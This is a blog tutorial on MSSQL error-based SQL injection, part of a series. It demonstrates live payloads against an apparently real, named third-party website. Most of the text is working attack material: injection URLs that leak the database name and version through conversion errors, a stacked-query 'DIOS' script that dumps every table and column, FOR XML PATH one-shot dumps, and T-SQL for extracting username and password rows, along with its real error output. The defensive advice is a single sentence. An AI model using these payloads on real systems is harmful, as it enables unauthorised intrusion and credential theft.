MSSQL Error Based Injection

In the Name of ALLAH the Most Beneficent and the Merciful

Hey, it has been a long time since I updated securityidiots. Here I will continue with the second part of MSSQL Injection. I assume you have read the previous tutorial before moving to this one; if not, here is the link:
MSSQL Union Based Injection
So here we start with the second tutorial of the MSSQL Injection series below:
1. MSSQL Union Based Injection
2. MSSQL Error Based Injection
3. MSSQL Blind Injection
4. MSSQL Time Based Blind Injection
5. MSSQL Error Based Blind Injection
6. MSSQL DIOS (Dump in One Shot)
7. Pushing Files via MSSQLi
8. Remote Code Execution via MSSQLi
I won't make this tutorial very lengthy, as MSSQL error based injection is one of the easiest techniques to work with.
First of all, be clear about when and why to use error based SQLi: when you cannot get any output through a UNION based injection, but the database error is echoed back in the page. In that case the trick is to make the server put the data you want inside the error message itself, and that is what error based injection does.

For this tutorial we will use http://www.timescanindia.in/Product.aspx?Id=7. This site gives some trouble with UNION based injection; it is still possible to inject it that way, but we will use error based injection here since that is what this tutorial is about.

Checking the type of injection and the rest of the groundwork is covered in the first part, so there is no point repeating it here.
http://www.timescanindia.in/Product.aspx?Id=7%27
ERROR
http://www.timescanindia.in/Product.aspx?Id=7%22
ERROR
When both the single quote and the double quote give an error, the injection is most likely integer based, i.e. the value is not quoted at all. If the parameter sat inside single quotes, a double quote would be harmless and only the single quote would break the query; if it sat inside double quotes, the reverse. Only an unquoted number breaks on both, so when both quotes error out, treat the injection as integer type.

Now, to go ahead we need to know the comment syntax MSSQL accepts:
--      Comment Type 1 (line comment)
--+     Comment Type 2 (line comment; the + decodes to a space in the URL)
--+-    SQL Comment (line comment with a trailing dash)
/**/    Inline Comment (block comment)
;%00    Null Byte (ends the statement only when the application or driver truncates the string at the null byte, so it is the least reliable of the lot)
Now let's try the basic -- comment on our target:
http://www.timescanindia.in/Product.aspx?Id=7--
Loads fine, so the comment is accepted.
http://www.timescanindia.in/Product.aspx?Id=7 order by 1--
No error.
http://www.timescanindia.in/Product.aspx?Id=7 order by 100--
Here comes the error: The ORDER BY position number 100 is out of range of the number of items in the select list. Our input is reaching the query and the database error text is echoed back to us, which is all error based injection needs.

Now let's make the error carry our output. db_name() returns an nvarchar; comparing it with the integer 1 forces SQL Server to convert the string to int (int has the higher data type precedence), the conversion fails, and the error message quotes the value it could not convert:
http://www.timescanindia.in/Product.aspx?Id=7 and 1=db_name()--
Boom, we get the error, and the output, the database name, comes with it:
Conversion failed when converting the nvarchar value 'timescanindia' to data type int


Yeah, I know, it really is that easy.

Fine, so let's continue and get the version the same way.
http://www.timescanindia.in/Product.aspx?Id=7 and @@version=1--
Again we get an error, and the version string comes with it:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int.
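Both requests above work for the same reason: SQL Server compares values by data type precedence, int outranks nvarchar, so the string side is converted to int, the conversion fails, and the failing value is quoted in the error. The following is an added example of mine, not code from the original post: the same oracle written out as T-SQL, with the two safeguards a practitioner adds in practice (a non-numeric prefix and an explicit CAST) and a way to walk tables, columns and rows one request at a time. The shape of the server-side query, the Products table, and the dbo.users table with its username and password columns are assumptions, since the page never shows the back-end query.

```sql
-- Added example, not from the original post. Assumed shape of the vulnerable
-- query: everything after "Id = 7" is our input, URL-encoded in the request.

-- 1. The form used in the post. It leaks only while the value is non-numeric:
--    a value such as '2012' converts to int cleanly and raises no error at all.
SELECT * FROM Products WHERE Id = 7 AND 1 = db_name() --

-- 2. Safer form: the '~' prefix guarantees the conversion fails, and the CAST
--    lets the same payload read int, datetime or uniqueidentifier columns.
--    Error: Conversion failed when converting the nvarchar value '~timescanindia' to data type int.
SELECT * FROM Products WHERE Id = 7 AND 1 = '~' + CAST(db_name() AS NVARCHAR(4000)) --

-- 3. Counts are int, so they must be cast too; without the cast the comparison
--    just evaluates to false and the page silently shows no product.
SELECT * FROM Products WHERE Id = 7 AND 1 = '~' + CAST((SELECT COUNT(*) FROM information_schema.tables) AS NVARCHAR(10)) --

-- 4. One table per request: raise rn (1, 2, 3, ...) on each request.
--    Past the last table the subquery is NULL, '~' + NULL is NULL, and no
--    error is raised; that silence is the end-of-list signal.
SELECT * FROM Products WHERE Id = 7 AND 1 = '~' + (
    SELECT table_name FROM (
        SELECT table_name, ROW_NUMBER() OVER (ORDER BY table_name) AS rn
        FROM information_schema.tables
    ) AS t WHERE rn = 1
) --

-- 5. Columns of one table, same technique (table name assumed).
SELECT * FROM Products WHERE Id = 7 AND 1 = '~' + (
    SELECT column_name FROM (
        SELECT column_name, ROW_NUMBER() OVER (ORDER BY ordinal_position) AS rn
        FROM information_schema.columns WHERE table_name = 'users'
    ) AS c WHERE rn = 1
) --

-- 6. Data, one row per request (table and columns assumed). ISNULL matters:
--    a NULL anywhere in the concatenation makes the whole expression NULL and
--    the error disappears, so the row would be skipped unnoticed.
SELECT * FROM Products WHERE Id = 7 AND 1 = '~' + (
    SELECT ISNULL(CAST(username AS NVARCHAR(4000)), '') + ':' + ISNULL(CAST(password AS NVARCHAR(4000)), '')
    FROM (
        SELECT username, password, ROW_NUMBER() OVER (ORDER BY username) AS rn
        FROM dbo.users
    ) AS u WHERE rn = 1
) --
```

In the URL the + of the string concatenation has to be sent as %2b, otherwise it decodes to a space; for example Product.aspx?Id=7 and 1='~'%2bCAST(db_name() AS NVARCHAR(4000))--. On the defensive side the fix is a parameterised query, and on top of that the application should never return the raw SqlException message to the client, because the message itself is the data channel here.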

Now let's play our finishing move: a stacked query that builds the whole table and column list into one variable and stores it in a table we can then read through a conversion error.
http://www.timescanindia.in/Product.aspx?Id=7;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
Above we used MSSQL DIOS; you can find the complete explanation of DIOS here. Decoded, the stacked query after the ; reads as below. Two defects in the URL are fixed in the decoded form: 'char(10)' after the Injected by Zen label is a quoted literal, so it prints the text char(10) instead of a line break, and @tblName VARCHAR(50) / @colNames VARCHAR(100) are too small (T-SQL silently truncates on assignment, long column lists get cut, and a truncated table name no longer matches the NOT IN check and gets picked again), so both are widened.

BEGIN
  DECLARE @data VARCHAR(8000), @counter INT, @tblName VARCHAR(128), @colNames VARCHAR(8000)
  DECLARE @tmpTbl TABLE (name VARCHAR(8000) NOT NULL)
  SET @counter = 1
  SET @data = 'a' + CHAR(10) + 'Injected by Zen :: ' + CHAR(10) + @@version + CHAR(10) + 'Database :: ' + db_name() + CHAR(10) + CHAR(10)
  SET @tblName = ''
  SET @colNames = ''
  -- one iteration per table; @tmpTbl remembers the tables already dumped
  WHILE @counter <= (SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)
  BEGIN
    SET @colNames = ''
    SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (SELECT name FROM @tmpTbl)
    -- variable concatenation: one SELECT appends every column of the table
    SELECT @colNames = @colNames + ' : ' + column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName
    INSERT @tmpTbl VALUES (@tblName)
    SET @data = @data + 'Table : ' + @tblName + CHAR(10) + 'Columns :' + @colNames + CHAR(10)
    SET @counter = @counter + 1
  END
  -- SELECT ... INTO creates a real table holding the dump for the next request
  SELECT @data AS output INTO err_dios
END--
Now read the table we just created, again through a conversion error:
http://www.timescanindia.in/Product.aspx?Id=7%20and%20%28select%20output%20from%20err_dios%29=1
The error message now carries the whole dump built in @data: version, database name, and every table with its columns. Two caveats: the stacked query needs a driver that allows several statements per request (ASP.NET's SqlClient does) and needs rights to create a table in the current database, since SELECT ... INTO creates a real table; and err_dios stays behind until you drop it, so clean up with ;DROP TABLE err_dios-- when you are done. If the server rejects output as a reserved word, write it as [output] in both requests.

That does the trick for us, but there are other ways to run an error based injection. One is to pull all tables and columns in a single query with FOR XML PATH, which concatenates every row into one string:

http://www.timescanindia.in/Product.aspx?Id=7 and 1=(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(''))--
A subquery with FOR XML (and no TYPE directive) comes back as nvarchar(max), so the 1= comparison fails exactly as before and the error message carries the whole list. The as t alias wraps every value in <t></t> tags in the output and can be dropped. Keep in mind that the error text is cut off on long output, so on a big schema filter by table_schema or table_name and dump in parts.
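As an added example, not from the original post, here is the FOR XML one-shot written out as T-SQL and taken a step further: columns grouped under their table, rows of a data table dumped in one error, and paging for when the error text is cut off. The server-side query shape, the Products table, and the dbo.users table with username and password columns are assumed.

```sql
-- Added example, not from the original post. Assumed vulnerable query shape;
-- the injected part starts after "Id = 7". A FOR XML subquery without TYPE is
-- returned as nvarchar(max), so the int comparison fails and leaks it whole.

-- 1. Every table in the dbo schema with its columns, in one error message.
--    Unaliased expressions in PATH mode come out as plain text, so there are
--    no <t></t> wrappers as with the "as t" alias used in the post.
SELECT * FROM Products WHERE Id = 7 AND 1 = (
    SELECT t.table_name + ': ' + (
        SELECT c.column_name + ', '
        FROM information_schema.columns AS c
        WHERE c.table_schema = t.table_schema AND c.table_name = t.table_name
        ORDER BY c.ordinal_position
        FOR XML PATH('')
    ) + ' | '
    FROM information_schema.tables AS t
    WHERE t.table_schema = 'dbo'
    FOR XML PATH('')
) --

-- 2. Rows of a data table in one shot (table and columns assumed). ISNULL keeps
--    a NULL column from erasing the whole row from the concatenation.
SELECT * FROM Products WHERE Id = 7 AND 1 = (
    SELECT ISNULL(CAST(username AS NVARCHAR(4000)), '') + ':' + ISNULL(CAST(password AS NVARCHAR(4000)), '') + ' | '
    FROM dbo.users
    FOR XML PATH('')
) --

-- 3. The error text is cut off on long output, so when the dump is truncated,
--    page through it: TOP n plus a filter on the last value already seen.
SELECT * FROM Products WHERE Id = 7 AND 1 = (
    SELECT TOP 20 t.table_name + ' | '
    FROM information_schema.tables AS t
    WHERE t.table_name > 'Products'   -- last table name seen in the previous page
    ORDER BY t.table_name
    FOR XML PATH('')
) --
```

Because the result is built as XML text, characters such as &, < and > in the data come back as entities (&amp;, &lt;, &gt;) and need to be decoded on your side.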
So Here we are finished with MSSQL Error Based Injection.